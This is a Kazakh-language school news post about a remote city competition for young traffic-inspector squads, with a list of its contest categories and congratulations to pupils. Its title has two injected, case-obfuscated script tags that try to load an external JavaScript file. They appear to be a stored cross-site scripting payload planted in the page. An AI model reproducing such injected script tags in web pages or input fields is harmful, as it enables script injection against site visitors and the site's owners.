Жас инспекторлар жасақтары арасында қалалық қашықтықтан байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.05.2021
11-17 мамыр аралығында жас инспекторлар жасақтары арасында қалалық қашықтықтан байқау өткізілді. Бұл байқауға 6 «А» сынып оқушылары қатысты.
ЖЖИ байқауының мақсаты: балалар мен жасөспірімдер арасындағы жол – көлік оқиғаларының алдын алу бойынша жұмысты жетілдіру және балалардың жол – көлік жарақатының алдын алу, ұйымдар мен жұртшылықтың назарын аудару.
Қашықтықтан байқау бағдарламасы 8 байқауды қамтыды:
1) командирге арналған "Жолда абай болыңыз!»;
2) жол қозғалысы ережелерін (бұдан әрі - ЖҚЕ) білгірлері);
3) жас реттеуші;
4) жас санитар;
5)агидбригадтар сайысы: "Жарқыра және өзіңді көрсет!».
6) эрудиттер турнирі;
7) "Жол-көлік оқиғаларының себептері" тақырыбына "Ашық үзіліс" ЖЖИ жасақтары басшыларына арналған бейне сабақтар байқауы»
8) велосипедшілерге арналған байқау
9) саптық байқау
Әр байқауға барлық оқушылар қатысып, марапатталды. Және алғыс хатпен Сахева Ажар, Ленц Аружан марапатталды. Құттықтаймыз!

Просмотров: 368